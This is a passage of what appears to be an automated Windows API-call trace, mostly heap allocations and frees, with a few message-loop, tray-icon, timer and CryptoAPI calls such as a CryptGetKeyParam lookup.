[0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0176.694] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0176.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0176.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.742] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 1 [0176.742] TranslateMessage (lpMsg=0x87e2d4) returned 0 [0176.742] DispatchMessageW (lpMsg=0x87e2d4) returned 0x0 [0176.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0176.742] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87d970) returned 1 [0176.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.742] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0176.742] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0176.743] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0176.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0176.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0176.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.748] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0176.748] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2888, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2888*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.750] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, 